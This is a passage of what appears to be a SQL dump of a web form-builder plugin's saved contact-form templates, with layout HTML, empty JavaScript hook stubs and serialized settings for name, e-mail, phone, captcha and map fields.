\r\n}','','',0,'%all%','%all%',7,1,'1#**id**#Name:#**label**#type_text#****#2#**id**#E-mail:#**label**#type_text#****#3#**id**#Phone:#**label**#type_phone#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#Enter the message as it&#039;s shown:#**label**#type_captcha#****#6#**id**#Message:#**label**#type_textarea#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_text#****#2#**id**#E-mail:#**label**#type_text#****#3#**id**#Phone:#**label**#type_phone#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#Enter the message as it&#039;s shown:#**label**#type_captcha#****#6#**id**#Message:#**label**#type_textarea#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_submit_reset*:*type*:*type_submit_reset_4*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*5*:*id*:*type_captcha*:*type*:*Enter the message as it&#039;s shown:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*6*:*w_digit*:**:*w_class*:**:*new_field*:*6*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(8,'Advanced Contact Form','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - custom_1%</div><div wdid=\"2\" class=\"wdform_row\">%2 - Pub/Brewery Name:%</div><div wdid=\"3\" class=\"wdform_row\">%3 - Full Name:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - Address:%</div><div wdid=\"10\" class=\"wdform_row\">%10 - E-mail:%</div><div wdid=\"11\" class=\"wdform_row\">%11 - Phone Number:%</div><div wdid=\"12\" class=\"wdform_row\">%12 - Custom Message (If selected above):%</div><div wdid=\"13\" class=\"wdform_row\">%13 - type_submit_reset_13%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',24,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',14,1,'1#**id**#custom_1#**label**#type_editor#****#2#**id**#Pub/Brewery Name:#**label**#type_text#****#3#**id**#Full Name:#**label**#type_name#****#4#**id**#Street Address#**label**#type_address#****#5#**id**#Street Address Line 2#**label**#type_address#****#6#**id**#City#**label**#type_address#****#7#**id**#State / Province / Region#**label**#type_address#****#8#**id**#Postal / Zip Code#**label**#type_address#****#9#**id**#Country#**label**#type_address#****#10#**id**#E-mail:#**label**#type_submitter_mail#****#11#**id**#Phone Number:#**label**#type_phone#****#12#**id**#Custom Message (If selected above):#**label**#type_textarea#****#13#**id**#type_submit_reset_13#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#custom_1#**label**#type_editor#****#2#**id**#Pub/Brewery Name:#**label**#type_text#****#3#**id**#Full Name:#**label**#type_name#****#4#**id**#Street Address#**label**#type_address#****#5#**id**#Street Address Line 2#**label**#type_address#****#6#**id**#City#**label**#type_address#****#7#**id**#State / Province / Region#**label**#type_address#****#8#**id**#Postal / Zip Code#**label**#type_address#****#9#**id**#Country#**label**#type_address#****#10#**id**#E-mail:#**label**#type_submitter_mail#****#11#**id**#Phone Number:#**label**#type_phone#****#12#**id**#Custom Message (If selected above):#**label**#type_textarea#****#13#**id**#type_submit_reset_13#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_editor*:*type*:*custom_1*:*w_field_label*:*<h2>Featured PubQuest Listing Request</h2><br>*:*w_editor*:**:*new_field*:*2*:*id*:*type_text*:*type*:*Pub/Brewery Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*3*:*id*:*type_name*:*type*:*Full Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*10*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*11*:*id*:*type_phone*:*type*:*Phone Number:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*12*:*id*:*type_textarea*:*type*:*Custom Message (If selected above):*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*13*:*id*:*type_submit_reset*:*type*:*type_submit_reset_13*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(9,'Contact Form with Map','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row\">%3 - Message:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - type_submit_reset_4%</div><div wdid=\"5\" class=\"wdform_row\">%5 - map_5%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',20,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',6,1,'1#**id**#Name:#**label**#type_text#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Message:#**label**#type_textarea#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#map_5#**label**#type_map#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_text#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Message:#**label**#type_textarea#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#map_5#**label**#type_map#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_submit_reset*:*type*:*type_submit_reset_4*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*5*:*id*:*type_map*:*type*:*map_5*:*w_field_label*:*2.2942540000000236*:*w_center_x*:*48.858334*:*w_center_y*:*2.294254*:*w_long*:*48.858334*:*w_lat*:*13*:*w_zoom*:*400*:*w_width*:*300*:*w_height*:**:*w_info*:*wdform_map*:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(10,'Contact Us with Captcha','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - custom_1%</div><div wdid=\"2\" class=\"wdform_row\">%2 - Name:%</div><div wdid=\"3\" class=\"wdform_row\">%3 - E-mail:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - Comments:%</div><div wdid=\"5\" class=\"wdform_row\">%5 - Type the characters you see here:%</div><div wdid=\"6\" class=\"wdform_row\">%6 - type_submit_reset_6%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',3,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',7,1,'1#**id**#custom_1#**label**#type_editor#****#2#**id**#Name:#**label**#type_name#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Comments:#**label**#type_textarea#****#5#**id**#Type the characters you see here:#**label**#type_captcha#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#custom_1#**label**#type_editor#****#2#**id**#Name:#**label**#type_name#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Comments:#**label**#type_textarea#****#5#**id**#Type the characters you see here:#**label**#type_captcha#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_editor*:*type*:*custom_1*:*w_field_label*:*<div><h2>Contact Us</h2><div>Please contact us for specific reasons.</div></div><p></p>*:*w_editor*:**:*new_field*:*2*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:*ex: myname@example.com*:*w_first_val*:*ex: myname@example.com*:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_textarea*:*type*:*Comments:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*5*:*id*:*type_captcha*:*type*:*Type the characters you see here:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*6*:*w_digit*:**:*w_class*:**:*new_field*:*6*:*id*:*type_submit_reset*:*type*:*type_submit_reset_6*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(11,'Tell a Friend','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - custom_1%</div></div></div><div wdid=\"2\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%2 - custom_2%</div><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"3\" class=\"wdform_row\">%3 - From:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - To:%</div><div wdid=\"5\" class=\"wdform_row\">%5 - Message:%</div><div wdid=\"6\" class=\"wdform_row\">%6 - type_submit_reset_6%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',3,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',7,1,'1#**id**#custom_1#**label**#type_editor#****#3#**id**#From:#**label**#type_text#****#4#**id**#To:#**label**#type_text#****#5#**id**#Message:#**label**#type_textarea#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#custom_1#**label**#type_editor#****#3#**id**#From:#**label**#type_text#****#4#**id**#To:#**label**#type_text#****#5#**id**#Message:#**label**#type_textarea#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_editor*:*type*:*custom_1*:*w_field_label*:*<h1>Tell a Friend</h1>*:*w_editor*:**:*new_field*:*2*:*id*:*type_section_break*:*type*:*custom_2*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*3*:*id*:*type_text*:*type*:*From:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*4*:*id*:*type_text*:*type*:*To:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*5*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*6*:*id*:*type_submit_reset*:*type*:*type_submit_reset_6*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(12,'Simple Contact','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row\">%3 - Website%</div><div wdid=\"4\" class=\"wdform_row\">%4 - type_submit_reset_4%</div></div><div class=\"wdform_column\"><div wdid=\"5\" class=\"wdform_row\">%5 - Message:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',6,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Website#**label**#type_text#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#Message:#**label**#type_textarea#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Website#**label**#type_text#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#Message:#**label**#type_textarea#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Website*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*4*:*id*:*type_submit_reset*:*type*:*type_submit_reset_4*:*w_field_label*:*Send Now!*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*5*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(13,'Advanced Contact Form 2','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - First Name:%</div><div wdid=\"2\" class=\"wdform_row\">%2 - custom_2%</div><div wdid=\"3\" class=\"wdform_row\">%3 - Last Name:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - custom_4%</div><div wdid=\"5\" class=\"wdform_row\">%5 - E-mail Address:%</div><div wdid=\"6\" class=\"wdform_row\">%6 - custom_6%</div><div wdid=\"7\" class=\"wdform_row\">%7 - Company / Restaurant Name:%</div><div wdid=\"8\" class=\"wdform_row\">%8 - custom_8%</div><div wdid=\"9\" class=\"wdform_row\">%9 - Telephone:%</div><div wdid=\"10\" class=\"wdform_row\">%10 - custom_10%</div><div wdid=\"11\" class=\"wdform_row\">%11 - Alternate Telephone:%</div><div wdid=\"12\" class=\"wdform_row\">%12 - custom_12%</div><div wdid=\"13\" class=\"wdform_row\">%13 - Requirements/ Comments:%</div><div wdid=\"14\" class=\"wdform_row\">%14 - custom_14%</div><div wdid=\"15\" class=\"wdform_row\">%15 - How Did You Hear About Us?%</div><div wdid=\"16\" class=\"wdform_row\">%16 - custom_16%</div><div wdid=\"17\" class=\"wdform_row\">%17 - custom_17%</div><div wdid=\"18\" class=\"wdform_row\">%18 - type_submit_reset_18%</div><div wdid=\"19\" class=\"wdform_row\">%19 - custom_19%</div><div wdid=\"20\" class=\"wdform_row\">%20 - custom_20%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',17,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',21,1,'1#**id**#First Name:#**label**#type_text#****#2#**id**#custom_2#**label**#type_editor#****#3#**id**#Last Name:#**label**#type_text#****#4#**id**#custom_4#**label**#type_editor#****#5#**id**#E-mail Address:#**label**#type_submitter_mail#****#6#**id**#custom_6#**label**#type_editor#****#7#**id**#Company / Restaurant Name:#**label**#type_text#****#8#**id**#custom_8#**label**#type_editor#****#9#**id**#Telephone:#**label**#type_text#****#10#**id**#custom_10#**label**#type_editor#****#11#**id**#Alternate Telephone:#**label**#type_text#****#12#**id**#custom_12#**label**#type_editor#****#13#**id**#Requirements/ Comments:#**label**#type_textarea#****#14#**id**#custom_14#**label**#type_editor#****#15#**id**#How Did You Hear About Us?#**label**#type_text#****#16#**id**#custom_16#**label**#type_editor#****#17#**id**#custom_17#**label**#type_editor#****#18#**id**#type_submit_reset_18#**label**#type_submit_reset#****#19#**id**#custom_19#**label**#type_editor#****#20#**id**#custom_20#**label**#type_editor#****##**id**##**label**##****#','1#**id**#First Name:#**label**#type_text#****#2#**id**#custom_2#**label**#type_editor#****#3#**id**#Last Name:#**label**#type_text#****#4#**id**#custom_4#**label**#type_editor#****#5#**id**#E-mail Address:#**label**#type_submitter_mail#****#6#**id**#custom_6#**label**#type_editor#****#7#**id**#Company / Restaurant Name:#**label**#type_text#****#8#**id**#custom_8#**label**#type_editor#****#9#**id**#Telephone:#**label**#type_text#****#10#**id**#custom_10#**label**#type_editor#****#11#**id**#Alternate Telephone:#**label**#type_text#****#12#**id**#custom_12#**label**#type_editor#****#13#**id**#Requirements/ Comments:#**label**#type_textarea#****#14#**id**#custom_14#**label**#type_editor#****#15#**id**#How Did You Hear About Us?#**label**#type_text#****#16#**id**#custom_16#**label**#type_editor#****#17#**id**#custom_17#**label**#type_editor#****#18#**id**#type_submit_reset_18#**label**#type_submit_reset#****#19#**id**#custom_19#**label**#type_editor#****#20#**id**#custom_20#**label**#type_editor#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*First Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*2*:*id*:*type_editor*:*type*:*custom_2*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Last Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*4*:*id*:*type_editor*:*type*:*custom_4*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*5*:*id*:*type_submitter_mail*:*type*:*E-mail Address:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*6*:*id*:*type_editor*:*type*:*custom_6*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*7*:*id*:*type_text*:*type*:*Company / Restaurant Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*8*:*id*:*type_editor*:*type*:*custom_8*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*9*:*id*:*type_text*:*type*:*Telephone:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*10*:*id*:*type_editor*:*type*:*custom_10*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*11*:*id*:*type_text*:*type*:*Alternate Telephone:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*12*:*id*:*type_editor*:*type*:*custom_12*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*13*:*id*:*type_textarea*:*type*:*Requirements/ Comments:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*14*:*id*:*type_editor*:*type*:*custom_14*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*15*:*id*:*type_text*:*type*:*How Did You Hear About Us?*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*16*:*id*:*type_editor*:*type*:*custom_16*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*17*:*id*:*type_editor*:*type*:*custom_17*:*w_field_label*:** Indicates required fields*:*w_editor*:**:*new_field*:*18*:*id*:*type_submit_reset*:*type*:*type_submit_reset_18*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*19*:*id*:*type_editor*:*type*:*custom_19*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*20*:*id*:*type_editor*:*type*:*custom_20*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(14,'Simple Contact with Phone','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row\">%3 - Phone:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - Message:%</div><div wdid=\"5\" class=\"wdform_row\">%5 - type_submit_reset_5%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',25,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	